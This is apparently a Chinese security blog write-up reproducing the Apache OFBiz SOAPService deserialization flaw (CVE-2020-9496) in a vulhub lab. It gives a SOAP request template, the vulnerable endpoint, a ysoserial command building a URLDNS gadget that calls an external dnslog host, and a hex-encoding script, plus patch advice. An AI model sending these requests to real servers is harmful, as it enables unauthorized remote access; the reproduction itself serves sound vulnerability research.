*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。
1、 简介
OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。
2、 漏洞描述
该两个漏洞允许用户未授权访问SOAPService接口,通过该接口攻击者可以利用ofbiz的反序列化远程命令执行来获得服务器权限。
3、 影响范围
Ofbiz:< 17.12.07
4、 漏洞环境
该漏洞可以使用vulhub中的CVE-2020-9496容器来进行复现,只需要进入vulhub目录,开启容器即可
https://vulhub.org/#/environments/ofbiz/CVE-2020-9496/
docker-compose up -d 开启容器。
开启后访问http://ip:8443/myportal/control/main
5、 复现
数据包:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/"> <soapenv:Header/> <soapenv:Body> <ser> <map-Map> <map-Entry> <map-Key> <cus-obj> [payload] </cus-obj> </map-Key> <map-Value> <std-String/> </map-Value> </map-Entry> </map-Map> </ser> </soapenv:Body> </soapenv:Envelope>
该漏洞需要用到工具ysoserial.jar。
git clone https://github.com/frohoff/ysoserial.git
漏洞url:
/webtools/control/SOAPService java -jar ysoserial.jar URLDNS http://8o0e9f.dnslog.cn >1.ot
生成1.ot后对其进行hex编码
python脚本:
import binascii filename = '1.ot' with open(filename, 'rb') as f: content = f.read() print(binascii.hexlify(content))
将payload复制进请求包中发送。
6、 漏洞防御
可更新至Apache OFBiz最新版。
下载地址:https://ofbiz.apache.org/download.html#vulnerabilities
临时修复建议:
若业务环境允许,使用白名单限制web端口的访问来降低风险。
来源:freebuf.com 2021-05-12 13:25:54 by: linluhaijing
请登录后发表评论
注册